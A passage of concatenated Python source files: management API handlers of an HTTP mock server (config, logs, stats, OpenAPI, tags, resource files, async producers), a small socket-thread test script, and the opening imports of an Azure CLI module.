        """Validate *data* against the config JSON schema; 400 on failure."""
        try:
            jsonschema.validate(instance=data, schema=self.http_server.definition.schema)
            return True
        except jsonschema.exceptions.ValidationError as e:
            self.set_status(400)
            self.write('JSON schema validation error:\n%s' % str(e))
            return False

    def dump(self, data) -> None:
        """Write *data* as JSON (default) or YAML when `?format=yaml`."""
        _format = self.get_query_argument('format', default='json')
        if _format == 'yaml':
            self.set_header('Content-Type', 'application/x-yaml')
            self.write(yaml.dump(data, sort_keys=False))
        else:
            self.write(data)
class ManagementStatsHandler(ManagementBaseHandler):
    """Global request statistics: GET returns them, DELETE resets them."""

    def initialize(self, stats):
        self.stats = stats

    async def get(self):
        snapshot = self.stats.json()
        self.write(snapshot)

    async def delete(self):
        self.stats.reset()
        self.set_status(204)
class ManagementLogsHandler(ManagementBaseHandler):
    """Traffic logs of all services: GET dumps, POST toggles, DELETE dumps-and-clears."""

    def initialize(self, logs):
        self.logs = logs

    async def get(self):
        self.write(self.logs.json())

    async def post(self):
        # Anything other than an explicit "false"/"False"/"0" enables logging.
        flag = self.get_body_argument('enable', default='True')
        enabled = flag not in ('false', 'False', '0')
        for service in self.logs.services:
            service.enabled = enabled
        self.set_status(204)

    async def delete(self):
        # Dump the logs one last time in the response, then clear them.
        self.write(self.logs.json())
        self.logs.reset()
class ManagementResetIteratorsHandler(ManagementBaseHandler):
    """Resets multi-response/dataset iterators for every service."""

    def initialize(self, http_server):
        self.http_server = http_server

    async def post(self):
        for application in self.http_server._apps.apps:
            _reset_iterators(application)
        for async_service in AsyncService.services:
            _reset_iterators(async_service)
        self.set_status(204)
class ManagementUnhandledHandler(ManagementBaseHandler):
    """Collects requests that matched no endpoint and renders them as config stubs."""

    def initialize(self, http_server):
        self.http_server = http_server

    async def get(self):
        data = {
            'services': []
        }
        for i, service in enumerate(HttpService.services):
            endpoints = self.build_unhandled_requests(i)
            if not endpoints:
                continue
            new_service = dict((k, getattr(service, k)) for k in UNHANDLED_SERVICE_KEYS if getattr(service, k) is not None)
            new_service['endpoints'] = endpoints
            data['services'].append(new_service)
        if data['services'] and not self.validate(data):  # pragma: no cover
            return
        # Report whether unhandled-request tracking is currently enabled.
        unhandled_data_enabled = False
        break_parent = False
        for app in self.http_server._apps.apps:
            if break_parent:
                break
            for rule in app.default_router.rules[0].target.rules:
                if rule.target == GenericHandler:
                    if rule.target_kwargs['unhandled_data']:
                        unhandled_data_enabled = True
                    if unhandled_data_enabled:
                        break_parent = True
                        break
        self.set_header('x-%s-unhandled-data' % PROGRAM.lower(), 'true' if unhandled_data_enabled else 'false')
        self.dump(data)

    async def post(self):
        # Enable/disable unhandled-request tracking based on the posted value.
        data = self.get_query_argument('data', default=None)
        if data is None:
            data = self.request.body.decode()
        unhandled_data = self.http_server.unhandled_data if data not in (None, False, 'false', 'False', 'None') else None
        for app in self.http_server._apps.apps:
            for rule in app.default_router.rules[0].target.rules:
                if rule.target == GenericHandler:
                    rule.target_kwargs['unhandled_data'] = unhandled_data
        # NOTE(review): assigning the raw flag string to `service.tags` looks
        # copy-pasted from ManagementTagHandler.post -- confirm it is intentional.
        for service in AsyncService.services:
            service.tags = data
        self.set_status(204)

    async def delete(self):
        # Clear the recorded unhandled requests of every service.
        for i, _ in enumerate(self.http_server.unhandled_data.requests):
            for key, _ in self.http_server.unhandled_data.requests[i].items():
                self.http_server.unhandled_data.requests[i][key] = []
        self.set_status(204)

    def build_unhandled_requests_headers(self, config_template: dict, request: Request, requests: dict) -> None:
        """Add headers common to *all* recorded requests, minus transport noise."""
        for key, value in request.headers._dict.items():
            continue_parent = False
            for _request in requests:
                if (
                    (key.title() not in _request[0].headers._dict)
                    or  # noqa: W504, W503
                    (key.title() in _request[0].headers._dict and value != _request[0].headers._dict[key.title()])
                ):
                    continue_parent = True
                    break
            if continue_parent:
                continue
            if key.lower() not in UNHANDLED_IGNORED_HEADERS:
                if 'headers' not in config_template:
                    config_template['headers'] = {}
                config_template['headers'][key] = value

    def build_unhandled_requests_response(self, config_template: dict, response: Response) -> None:
        """Fill in the response stub; undecodable payloads are base64-encoded."""
        if response is None:
            config_template['response'] = ''
        else:
            response.headers.pop('Content-Length', None)
            config_template['response'] = {
                'status': response.status,
                'headers': {},
                'body': ''
            }
            for key, value in response.headers.items():
                try:
                    config_template['response']['headers'][key] = value.decode()
                except (AttributeError, UnicodeDecodeError):
                    config_template['response']['headers'][key] = _b64encode(value) if isinstance(value, (bytes, bytearray)) else value
            if response.body is not None:
                try:
                    config_template['response']['body'] = response.body.decode()
                except (AttributeError, UnicodeDecodeError):
                    config_template['response']['body'] = _b64encode(response.body) if isinstance(response.body, (bytes, bytearray)) else response.body

    def build_unhandled_requests(self, service_id: int) -> list:
        """Turn each recorded unhandled request into an endpoint config stub."""
        endpoints = []
        for requests in self.http_server.unhandled_data.requests[service_id].values():
            if not requests:
                continue
            # Base the stub on the most recent request/response pair.
            request = requests[-1][0]
            response = requests[-1][1]
            config_template = {}
            # Path
            config_template['path'] = request.path
            # Method
            config_template['method'] = request.method
            # Headers
            self.build_unhandled_requests_headers(config_template, request, requests)
            # Query String
            for key, value in request.query_arguments.items():
                if 'queryString' not in config_template:
                    config_template['queryString'] = {}
                config_template['queryString'][key] = value[0].decode()
            # Response
            self.build_unhandled_requests_response(config_template, response)
            endpoints.append(config_template)
        return endpoints

    def validate(self, data) -> bool:
        """Validate the generated stub config against the schema; 400 on failure."""
        try:
            jsonschema.validate(instance=data, schema=self.http_server.definition.schema)
            return True
        except jsonschema.exceptions.ValidationError as e:  # pragma: no cover
            self.set_status(400)
            self.write('JSON schema validation error:\n%s' % str(e))
            return False

    def dump(self, data) -> None:
        """Write *data* as JSON (default) or YAML when `?format=yaml`."""
        _format = self.get_query_argument('format', default='json')
        if _format == 'yaml':
            self.set_header('Content-Type', 'application/x-yaml')
            self.write(yaml.dump(data, sort_keys=False))
        else:
            self.write(data)
class ManagementOasHandler(ManagementBaseHandler):
    """Builds and serves OpenAPI 3.0 documents for the mocked HTTP services."""

    def initialize(self, http_server):
        self.http_server = http_server

    async def get(self):
        data = {
            'documents': []
        }
        for service in HttpService.services:
            data['documents'].append(self.build_oas(service.internal_service_id))
        self.write(data)

    def build_oas(self, service_id):
        """Return the OAS document for one service.

        A user-supplied OAS document (``service.oas``) takes precedence;
        otherwise one is generated from the service's routing table.
        """
        service = self.http_server.definition.services[service_id]
        ssl = service.ssl
        protocol = 'https' if ssl else 'http'
        hostname = self.http_server.address if self.http_server.address else (
            'localhost' if service.hostname is None else service.hostname
        )
        if service.oas is not None:
            return self.build_oas_custom(protocol, hostname, service)
        document = {
            'openapi': '3.0.0',
            'info': {
                'title': service.name if service.name is not None else '%s://%s:%s' % (protocol, hostname, service.port),
                'description': 'Automatically generated Open API Specification.',
                'version': '0.1.9'
            },
            'servers': [
                {
                    'url': '%s://%s:%s' % (protocol, hostname, service.port),
                    'description': service.get_name_or_empty()
                }
            ],
            'paths': {}
        }
        path_methods = []
        for rule in self.http_server._apps.apps[service.internal_http_service_id].default_router.rules[0].target.rules:
            if rule.target == GenericHandler:
                path_methods = rule.target_kwargs['path_methods']
        for _, _methods in path_methods:
            path, methods = self.build_oas_methods(_methods)
            document['paths']['%s' % path] = methods
        # Keep paths deterministically ordered.
        document['paths'] = OrderedDict(sorted(document['paths'].items(), key=lambda t: t[0]))
        return document

    def build_oas_methods(self, _methods: dict) -> Tuple[str, dict]:
        """Convert one routing entry into an OAS path string plus method map."""
        first_alternative = list(_methods.values())[0][0]
        original_path = first_alternative.orig_path
        scheme, netloc, original_path, query, fragment = _urlsplit(original_path)
        query_string = parse_qs(query, keep_blank_values=True)
        path, path_params = self.path_handlebars_to_oas(original_path)
        methods = {}
        for method, alternatives in _methods.items():
            if not alternatives:  # pragma: no cover
                continue  # https://github.com/nedbat/coveragepy/issues/198
            alternative = alternatives[0]
            method_data = alternative.oas(path_params, query_string, self)
            if not method_data['responses']:
                method_data['responses']['default'] = {
                    'description': ''
                }
            methods[method.lower()] = method_data
        return path, methods

    def build_oas_custom(self, protocol: str, hostname: str, service: HttpService) -> dict:
        """Load the user-supplied OAS document and prepend this server's URL."""
        custom_oas = service.oas
        if isinstance(custom_oas, ConfigExternalFilePath):
            custom_oas_path = self.resolve_relative_path(self.http_server.definition.source_dir, custom_oas.path)
            with open(custom_oas_path, 'r') as file:
                custom_oas = json.load(file)
        if 'servers' not in custom_oas:
            custom_oas['servers'] = []
        custom_oas['servers'].insert(
            0,
            {
                'url': '%s://%s:%s' % (protocol, hostname, service.port),
                'description': service.get_name_or_empty()
            }
        )
        return custom_oas

    def path_handlebars_to_oas(self, path: str) -> Tuple[str, list]:
        """Translate `{{param}}` path segments into OAS `{param}` placeholders."""
        segments = _safe_path_split(path)
        params = []
        new_segments = []
        for segment in segments:
            match = re.search(r'{{(.*)}}', segment)
            if match is not None:
                name = match.group(1).strip()
                param = None
                if ' ' not in name:
                    param = name
                else:
                    # Complex handlebars expression: synthesize a positional name.
                    param = 'param%d' % (len(params) + 1)
                new_segments.append('{%s}' % param)
                params.append(param)
            else:
                new_segments.append(segment)
        return '/'.join(new_segments), params

    def resolve_relative_path(self, config_dir, source_text):
        """Resolve an `@path` reference, refusing anything outside *config_dir*."""
        relative_path = None
        orig_relative_path = source_text[1:]
        error_msg = 'External OAS document %r couldn\'t be accessed or found!' % orig_relative_path
        if orig_relative_path[0] == '/':
            orig_relative_path = orig_relative_path[1:]
        relative_path = os.path.join(config_dir, orig_relative_path)
        if not os.path.isfile(relative_path):
            self.send_error(500, message=error_msg)
            return None
        relative_path = os.path.abspath(relative_path)
        # Guard against path traversal escaping the config directory.
        if not relative_path.startswith(config_dir):
            self.send_error(500, message=error_msg)
            return None
        return relative_path
class ManagementTagHandler(ManagementBaseHandler):
    """Reads and replaces the set of active tags across all services."""

    def initialize(self, http_server):
        self.http_server = http_server

    async def get(self):
        collected = []
        for app in self.http_server._apps.apps:
            for rule in app.default_router.rules[0].target.rules:
                if rule.target == GenericHandler:
                    collected += rule.target_kwargs['tags']
        for service in AsyncService.services:
            collected += service.tags
        # De-duplicate before returning.
        self.write({'tags': list(set(collected))})

    async def post(self):
        raw = self.get_query_argument('current', default=None)
        if raw is None:
            raw = self.request.body.decode()
        tags = raw.split(',')
        for app in self.http_server._apps.apps:
            for rule in app.default_router.rules[0].target.rules:
                if rule.target == GenericHandler:
                    rule.target_kwargs['tags'] = tags
        for service in AsyncService.services:
            service.tags = tags
        self.set_status(204)
class ManagementResourcesHandler(ManagementBaseHandler):
    """CRUD access to the external resource files referenced by the config."""

    def initialize(self, http_server):
        self.http_server = http_server
        # Collect config-referenced files, restricted to the config directory
        # and excluding templated ({{...}}) paths.
        files = (obj.path[1:] for obj in ConfigExternalFilePath.files)
        cwd = self.http_server.definition.source_dir
        files = list(set(files))
        files = list(filter(lambda x: (os.path.abspath(os.path.join(cwd, x)).startswith(cwd)), files))
        new_files = []
        for path in files:
            fail = False
            for segment in os.path.split(path):
                match = re.search(r'{{(.*)}}', segment)
                if match is not None:
                    fail = True
                    break
            if not fail:
                new_files.append(path)
        files = new_files
        self.files = sorted(files)
        # Absolute counterparts used by the whitelist check below.
        self.files_abs = [os.path.abspath(os.path.join(cwd, x)) for x in self.files]

    async def get(self):
        """List the resource files, or return one file's content (text or stream)."""
        data = None
        cwd = self.http_server.definition.source_dir
        path = self.get_query_argument('path', default=None)
        orig_path = path
        if path is None:
            data = {
                'files': self.files
            }
            self.write(data)
            return
        else:
            try:
                self.check_path_empty(path)
                path = os.path.abspath(os.path.join(cwd, path.lstrip('/')))
                self.check_path_access(cwd, path, orig_path)
                # path is SAFE
                self.check_path_exists(path, orig_path)
                # path is OK
                self.check_path_is_not_directory(path, orig_path)
                self.check_if_path_defined_in_configuration_file(path, orig_path)
            except InternalResourcePathCheckError:
                return
            else:
                _format = self.get_query_argument('format', default='text')
                if _format == 'text':
                    with open(path, 'rb') as file:
                        data = file.read()
                elif _format == 'stream':
                    # Chunked download as an attachment.
                    buf_size = 4096
                    self.set_header('Content-Type', 'application/octet-stream')
                    self.set_header('Content-Disposition', 'attachment; filename=' + os.path.basename(path))
                    with open(path, 'rb') as f:
                        while True:
                            data = f.read(buf_size)
                            if not data:
                                break
                            self.write(data)
                    return
                self.write(data)

    async def post(self):
        """Create/overwrite resource files via multipart upload or form fields."""
        cwd = self.http_server.definition.source_dir
        path = self.get_body_argument('path', default=None)
        orig_path = path
        try:
            if path is not None:
                self.check_path_empty(path)
                path = os.path.abspath(os.path.join(cwd, path.lstrip('/')))
                self.check_path_access(cwd, path, orig_path)
                # path is SAFE
            if self.request.files:
                # Multipart upload: write each file under `path` (or cwd).
                for key, files in self.request.files.items():
                    for file in files:
                        if path is None:
                            file_path = os.path.join(cwd, key if key else file['filename'])
                        else:
                            file_path = os.path.join(path, key if key else file['filename'])
                        file_path = os.path.abspath(file_path)
                        self.check_path_access(cwd, file_path, file_path)
                        # file_path is SAFE
                        self.check_path_is_not_directory(file_path, file_path[len(cwd) + 1:])
                        self.check_if_path_defined_in_configuration_file(file_path, file_path[len(cwd) + 1:])
                        # file_path is OK
                        os.makedirs(os.path.dirname(file_path), exist_ok=True)
                        with open(file_path, 'wb') as _file:
                            _file.write(file['body'])
            else:
                # Plain form post: `file` holds the text content for `path`.
                file = self.get_body_argument('file', default=None)
                self.check_parameter_required(file, 'file')
                self.check_parameter_required(path, 'path')
                self.check_path_is_not_directory(path, orig_path)
                self.check_if_path_defined_in_configuration_file(path, orig_path)
                # path is OK
                os.makedirs(os.path.dirname(path), exist_ok=True)
                with open(path, 'w') as _file:
                    _file.write(file)
            self.set_status(204)
        except InternalResourcePathCheckError:
            return

    async def delete(self):
        """Delete a resource file (or directory); optionally prune empty parents."""
        cwd = self.http_server.definition.source_dir
        path = self.get_query_argument('path', default=None)
        keep = self.get_query_argument('keep', default=False)
        orig_path = path
        try:
            self.check_parameter_required(path, 'path')
            self.check_path_empty(path)
            path = os.path.abspath(os.path.join(cwd, path.lstrip('/')))
            self.check_path_access(cwd, path, orig_path)
            # path is SAFE
            self.check_path_exists(path, orig_path)
            self.check_if_path_defined_in_configuration_file(path, orig_path)
            # path is OK
        except InternalResourcePathCheckError:
            return
        if os.path.isfile(path):
            os.remove(path)
            if not keep:
                # Prune now-empty parent directories up to (not including) cwd.
                ref = os.path.dirname(path)
                while ref:
                    if os.listdir(ref) or ref == cwd:  # pragma: no cover
                        break
                    shutil.rmtree(ref)
                    ref = os.path.dirname(ref)
        elif os.path.isdir(path):
            shutil.rmtree(path)
        self.set_status(204)

    def check_path_empty(self, path: str) -> None:
        """400 when the supplied path is empty."""
        if not path:
            self.set_status(400)
            self.write('\'path\' cannot be empty!')
            raise InternalResourcePathCheckError()

    def check_path_access(self, cwd: str, path: str, orig_path: str) -> None:
        """403 when *path* escapes the configuration directory."""
        if not path.startswith(cwd):
            self.set_status(403)
            self.write('The path %s couldn\'t be accessed!' % orig_path)
            raise InternalResourcePathCheckError()

    def check_path_exists(self, path: str, orig_path: str) -> None:
        """400 when *path* does not exist."""
        if not os.path.exists(path):
            self.set_status(400)
            self.write('The path %s does not exist!' % orig_path)
            raise InternalResourcePathCheckError()

    def check_parameter_required(self, obj: str, subject: str) -> None:
        """400 when a required parameter is missing."""
        if obj is None:
            self.set_status(400)
            self.write('\'%s\' parameter is required!' % subject)
            raise InternalResourcePathCheckError()

    def check_path_is_not_directory(self, path: str, orig_path: str) -> None:
        """400 when *path* points at a directory."""
        if os.path.isdir(path):
            self.set_status(400)
            self.write('The path %s is a directory!' % orig_path)
            raise InternalResourcePathCheckError()

    def check_if_path_defined_in_configuration_file(self, path: str, orig_path: str) -> None:
        """400 when *path* is not one of the config-referenced resource files."""
        if path not in self.files_abs:
            self.set_status(400)
            self.write('The path %s is not defined in the configuration file!' % orig_path)
            raise InternalResourcePathCheckError()
class ManagementServiceRootHandler(ManagementBaseHandler):
    """Serves the management UI page for a single service."""

    async def get(self):
        page = os.path.join(__location__, 'res/management.html')
        with open(page, 'r') as stream:
            self.write(stream.read())
class ManagementServiceRootRedirectHandler(ManagementBaseHandler):
    """Redirects the bare management path to its slash-terminated root."""

    def initialize(self, management_root):
        self.management_root = management_root

    async def get(self):
        target = '/%s/' % self.management_root
        self.redirect(target)
class ManagementServiceConfigHandler(ManagementConfigHandler):
    """This handler is only valid for HTTP services and should always operate on `ConfigHttpService`."""

    def initialize(self, http_server, service_id):
        self.http_server = http_server
        self.service_id = service_id

    async def get(self):
        data = self.http_server.definition.data['services'][self.service_id]
        self.dump(data)

    async def post(self):
        """Validate and hot-swap the configuration of this single HTTP service."""
        data = self.decode()
        definition = self.http_server.definition
        if data is None:
            return
        # Validate in the context of the full config with this service replaced.
        imaginary_config = copy.deepcopy(definition.data)
        imaginary_config['services'][self.service_id] = data
        # This check fails for asynchronous services
        if not self.validate(imaginary_config) or not self.check_restricted_fields(data, self.service_id):
            return
        internal_http_service_id = definition.services[self.service_id].internal_http_service_id
        config_root_builder = ConfigRootBuilder()
        # `service` should always be an instance of `ConfigHttpService`
        service = config_root_builder.build_config_service(data, internal_service_id=self.service_id)
        definition.config_root.services[self.service_id].destroy()
        definition.config_root.services[self.service_id] = service
        definition.logs.update_service(self.service_id, service.get_name())
        definition.stats.update_service(self.service_id, service.get_hint())
        definition.services[self.service_id] = definition.analyze_http_service(
            service,
            definition.template_engine,
            definition.rendering_queue,
            performance_profiles=definition.config_root.performance_profiles,
            global_performance_profile=None if definition.config_root.globals is None else definition.config_root.globals.performance_profile,
            internal_http_service_id=internal_http_service_id
        )
        definition.data['services'][self.service_id] = data
        # Rebuild the routing table with the re-analyzed service.
        self.update_service(definition.services[self.service_id], self.service_id)
        self.set_status(204)
class ManagementServiceStatsHandler(ManagementBaseHandler):
    """Per-service statistics: GET returns them, DELETE resets them."""

    def initialize(self, stats, service_id):
        self.stats = stats
        self.service_id = service_id

    async def get(self):
        entry = self.stats.services[self.service_id]
        self.write(entry.json())

    async def delete(self):
        self.stats.services[self.service_id].reset()
        self.set_status(204)
class ManagementServiceLogsHandler(ManagementBaseHandler):
    """Per-service traffic logs: GET returns them, POST toggles collection,
    DELETE returns-and-clears them."""

    def initialize(self, logs, service_id):
        self.logs = logs
        self.service_id = service_id

    async def get(self):
        self.write(self.logs.services[self.service_id].json())

    async def post(self):
        # Anything other than an explicit "false"/"False"/"0" enables logging.
        # Default changed from the bool True to the string 'True' for type
        # consistency with ManagementLogsHandler.post; the resulting behavior
        # is identical (neither value is in the disable tuple).
        self.logs.services[self.service_id].enabled = not (
            self.get_body_argument('enable', default='True') in ('false', 'False', '0')
        )
        self.set_status(204)

    async def delete(self):
        # Dump the logs one last time in the response, then clear them.
        self.write(self.logs.services[self.service_id].json())
        self.logs.services[self.service_id].reset()
class ManagementServiceResetIteratorsHandler(ManagementBaseHandler):
    """This handler is only valid for HTTP services and should always operate on `HttpService`."""

    def initialize(self, http_server, service_id):
        self.http_server = http_server
        self.service_id = service_id

    async def post(self):
        # `service` should always be an instance of `HttpService`
        service = self.http_server.definition.services[self.service_id]
        target_app = self.http_server._apps.apps[service.internal_http_service_id]
        _reset_iterators(target_app)
        self.set_status(204)
class ManagementServiceUnhandledHandler(ManagementUnhandledHandler):
    """Per-service variant of the unhandled-requests endpoint."""

    def initialize(self, http_server, service_id):
        self.http_server = http_server
        self.service_id = service_id

    async def get(self):
        data = {
            'services': []
        }
        service = self.http_server.definition.services[self.service_id]
        data['services'].append(dict((k, getattr(service, k)) for k in UNHANDLED_SERVICE_KEYS if getattr(service, k) is not None))
        data['services'][0]['endpoints'] = self.build_unhandled_requests(self.service_id)
        # Validate the stub in the context of the full configuration.
        imaginary_config = copy.deepcopy(self.http_server.definition.data)
        imaginary_config['services'] = data['services']
        unhandled_data_enabled = False
        service = self.http_server.definition.services[self.service_id]
        for rule in self.http_server._apps.apps[service.internal_http_service_id].default_router.rules[0].target.rules:
            if rule.target == GenericHandler:
                if rule.target_kwargs['unhandled_data']:
                    unhandled_data_enabled = True
                break
        self.set_header('x-%s-unhandled-data' % PROGRAM.lower(), 'true' if unhandled_data_enabled else 'false')
        if not self.validate(imaginary_config):  # pragma: no cover
            return
        self.dump(data)

    async def post(self):
        # Toggle unhandled-request tracking for this service only.
        data = self.get_query_argument('data', default=None)
        if data is None:
            data = self.request.body.decode()
        unhandled_data = self.http_server.unhandled_data if data not in (None, False, 'false', 'False', 'None') else None
        # `service` should always be an instance of `HttpService`
        service = self.http_server.definition.services[self.service_id]
        for rule in self.http_server._apps.apps[service.internal_http_service_id].default_router.rules[0].target.rules:
            if rule.target == GenericHandler:
                rule.target_kwargs['unhandled_data'] = unhandled_data
        self.set_status(204)

    async def delete(self):
        # Clear the recorded unhandled requests of this service.
        for key, _ in self.http_server.unhandled_data.requests[self.service_id].items():
            self.http_server.unhandled_data.requests[self.service_id][key] = []
        self.set_status(204)
class ManagementServiceOasHandler(ManagementOasHandler):
    """Serves the OpenAPI Specification document of a single service."""

    def initialize(self, http_server, service_id):
        self.http_server = http_server
        self.service_id = service_id

    async def get(self):
        oas_document = self.build_oas(self.service_id)
        self.write(oas_document)
class ManagementServiceTagHandler(ManagementBaseHandler):
    """This handler is only valid for HTTP services and should always operate on `HttpService`."""

    def initialize(self, http_server, service_id):
        self.http_server = http_server
        self.service_id = service_id

    async def get(self):
        """Report the tags currently set on this service's generic handler (204 when none)."""
        # `service` should always be an instance of `HttpService`
        service = self.http_server.definition.services[self.service_id]
        router_rules = self.http_server._apps.apps[service.internal_http_service_id].default_router.rules[0].target.rules
        tags = None
        for rule in router_rules:
            if rule.target == GenericHandler:
                tags = rule.target_kwargs['tags']
        if tags:
            self.write({'tags': tags})
        else:
            self.set_status(204)

    async def post(self):
        """Replace the service's tags with a comma-separated list from query or body."""
        raw = self.get_query_argument('current', default=None)
        if raw is None:
            raw = self.request.body.decode()
        new_tags = raw.split(',')
        # `service` should always be an instance of `HttpService`
        service = self.http_server.definition.services[self.service_id]
        router_rules = self.http_server._apps.apps[service.internal_http_service_id].default_router.rules[0].target.rules
        for rule in router_rules:
            if rule.target == GenericHandler:
                rule.target_kwargs['tags'] = new_tags
        self.set_status(204)
class UnhandledData:
    """Container for captured unhandled requests, one entry per service."""

    def __init__(self):
        # Populated elsewhere; starts empty for every new instance.
        self.requests = []
class ManagementAsyncHandler(ManagementBaseHandler):
    """Lists every registered async producer and consumer."""

    def initialize(self, http_server):
        self.http_server = http_server

    async def get(self):
        data = {
            'producers': [producer.info() for producer in AsyncProducer.producers],
            'consumers': [consumer.info() for consumer in AsyncConsumer.consumers]
        }
        self.dump(data)

    def dump(self, data) -> None:
        """Write `data` as JSON, or as YAML when `?format=yaml` is requested."""
        requested_format = self.get_query_argument('format', default='json')
        if requested_format != 'yaml':
            self.write(data)
        else:
            self.set_header('Content-Type', 'application/x-yaml')
            self.write(yaml.dump(data, sort_keys=False))
class ManagementAsyncProducersHandler(ManagementBaseHandler):
    """Triggers an async producer, addressed either by numeric index or by actor name."""

    def initialize(self, http_server):
        self.http_server = http_server

    def _spawn_produce_thread(self, producer) -> None:
        # Produce on a daemon thread so the HTTP response is not blocked by the delay.
        t = threading.Thread(target=producer.produce, args=(), kwargs={
            'ignore_delay': True
        })
        t.daemon = True
        t.start()

    async def post(self, value):
        """Trigger a producer.

        `value` is either a numeric producer index or a (URL-quoted) actor name.
        Responds 202 with the producer info on success, 400 for an unknown
        index/name and 410 when the producer is exhausted or locked.
        """
        if value.isnumeric():
            try:
                index = int(value)
                producer = AsyncProducer.producers[index]
                try:
                    producer.check_tags()
                    producer.check_payload_lock()
                    producer.check_dataset_lock()
                    self._spawn_produce_thread(producer)
                    self.set_status(202)
                    self.write(producer.info())
                except (
                    AsyncProducerListHasNoPayloadsMatchingTags,
                    AsyncProducerPayloadLoopEnd,
                    AsyncProducerDatasetLoopEnd
                ) as e:
                    self.set_status(410)
                    self.write(str(e))
                    return
            except IndexError:
                self.set_status(400)
                self.write('Invalid producer index!')
                return
        else:
            producer = None
            actor_name = unquote(value)
            # Every actor matching the name is triggered; the last one's info is reported.
            for service in AsyncService.services:
                for actor in service.actors:
                    if actor.name == actor_name:
                        if actor.producer is None:  # pragma: no cover
                            continue
                        producer = actor.producer
                        try:
                            producer.check_tags()
                            producer.check_payload_lock()
                            producer.check_dataset_lock()
                            self._spawn_produce_thread(producer)
                        except (
                            AsyncProducerListHasNoPayloadsMatchingTags,
                            AsyncProducerPayloadLoopEnd,
                            AsyncProducerDatasetLoopEnd
                        ) as e:
                            self.set_status(410)
                            self.write(str(e))
                            return
            if producer is None:
                self.set_status(400)
                self.write('No producer actor is found for: %r' % actor_name)
                return
            else:
                self.set_status(202)
                self.write(producer.info())
class ManagementAsyncConsumersHandler(ManagementBaseHandler):
    """Reads or resets an async consumer's log, addressed by index or actor name."""

    def initialize(self, http_server):
        self.http_server = http_server

    def _find_consumer(self, actor_name):
        # Returns the consumer of the last actor matching `actor_name`, or None.
        # (The original duplicated this loop in `get` and `delete`, with unused
        # `enumerate` counters.)
        consumer = None
        for service in AsyncService.services:
            for actor in service.actors:
                if actor.name == actor_name:
                    if actor.consumer is None:  # pragma: no cover
                        continue
                    consumer = actor.consumer
        return consumer

    async def get(self, value):
        """Return the consumer's captured log; 400 for an unknown index/name."""
        if value.isnumeric():
            try:
                index = int(value)
                consumer = AsyncConsumer.consumers[index]
                self.write(consumer.single_log_service.json())
            except IndexError:
                self.set_status(400)
                self.write('Invalid consumer index!')
                return
        else:
            actor_name = unquote(value)
            consumer = self._find_consumer(actor_name)
            if consumer is None:
                self.set_status(400)
                self.write('No consumer actor is found for: %r' % actor_name)
                return
            else:
                self.write(consumer.single_log_service.json())

    async def delete(self, value):
        """Reset the consumer's captured log; 400 for an unknown index/name."""
        if value.isnumeric():
            try:
                index = int(value)
                consumer = AsyncConsumer.consumers[index]
                consumer.single_log_service.reset()
                self.set_status(204)
            except IndexError:
                self.set_status(400)
                self.write('Invalid consumer index!')
                return
        else:
            actor_name = unquote(value)
            consumer = self._find_consumer(actor_name)
            if consumer is None:
                self.set_status(400)
                self.write('No consumer actor is found for: %r' % actor_name)
                return
            else:
                consumer.single_log_service.reset()
                self.set_status(204)
|
test_local.py | import interface_c_python_location
import interface_c_python_commands
import logging
import os
import threading
logging.basicConfig(level=logging.DEBUG)

# Start from a clean slate: remove stale socket files left by earlier runs.
for stale_socket in ("socketLocation", "socketCommands"):
    if os.path.exists(stale_socket):
        os.remove(stale_socket)

interface_loc = interface_c_python_location.SocketLocation()
interface_com = interface_c_python_commands.SocketCommands()

try:
    # Run both socket interfaces concurrently and wait for them to finish.
    location_thread = threading.Thread(target=interface_loc.run)
    commands_thread = threading.Thread(target=interface_com.run)
    location_thread.start()
    commands_thread.start()
    location_thread.join()
    commands_thread.join()
except Exception as e:
    print(f'Exception {e}')
# socket = interface_c_python_location.SocketServer()
# if os.path.exists("socketCommands"):
# os.remove("socketCommands") |
custom.py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import colorama
import base64
import binascii
import datetime
import errno
import io
import json
import os
import os.path
import platform
import random
import re
import shutil
import ssl
import stat
import string
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import webbrowser
import zipfile
from distutils.version import StrictVersion
from math import isnan
from urllib.request import urlopen
from urllib.error import URLError
# pylint: disable=import-error
import yaml
import dateutil.parser
from dateutil.relativedelta import relativedelta
from knack.log import get_logger
from knack.util import CLIError
from knack.prompting import NoTTYException, prompt_y_n
from msrestazure.azure_exceptions import CloudError
import requests
# pylint: disable=no-name-in-module,import-error
from azure.cli.command_modules.acs import acs_client, proxy
from azure.cli.command_modules.acs._params import regions_in_preview, regions_in_prod
from azure.cli.core.api import get_config_dir
from azure.cli.core.azclierror import (ResourceNotFoundError,
ClientRequestError,
ArgumentUsageError,
InvalidArgumentValueError,
MutuallyExclusiveArgumentError,
ValidationError,
UnauthorizedError,
AzureInternalError,
FileOperationError)
from azure.cli.core._profile import Profile
from azure.cli.core.profiles import ResourceType
from azure.cli.core.commands.client_factory import get_mgmt_service_client, get_subscription_id
from azure.cli.core.keys import is_valid_ssh_rsa_public_key
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait
from azure.cli.core.commands import LongRunningOperation
from azure.graphrbac.models import (ApplicationCreateParameters,
ApplicationUpdateParameters,
PasswordCredential,
KeyCredential,
ServicePrincipalCreateParameters,
GetObjectsParameters,
ResourceAccess, RequiredResourceAccess)
from azure.mgmt.containerservice.models import ContainerServiceOrchestratorTypes
from ._client_factory import cf_container_services
from ._client_factory import cf_resource_groups
from ._client_factory import get_auth_management_client
from ._client_factory import get_graph_rbac_management_client
from ._client_factory import cf_resources
from ._client_factory import get_resource_by_name
from ._client_factory import cf_container_registry_service
from ._client_factory import cf_agent_pools
from ._client_factory import get_msi_client
from ._consts import CONST_SCALE_SET_PRIORITY_REGULAR, CONST_SCALE_SET_PRIORITY_SPOT, CONST_SPOT_EVICTION_POLICY_DELETE
from ._consts import CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME
from ._consts import CONST_MONITORING_ADDON_NAME
from ._consts import CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID
from ._consts import CONST_VIRTUAL_NODE_ADDON_NAME
from ._consts import CONST_VIRTUAL_NODE_SUBNET_NAME
from ._consts import CONST_KUBE_DASHBOARD_ADDON_NAME
from ._consts import CONST_AZURE_POLICY_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_ADDON_NAME
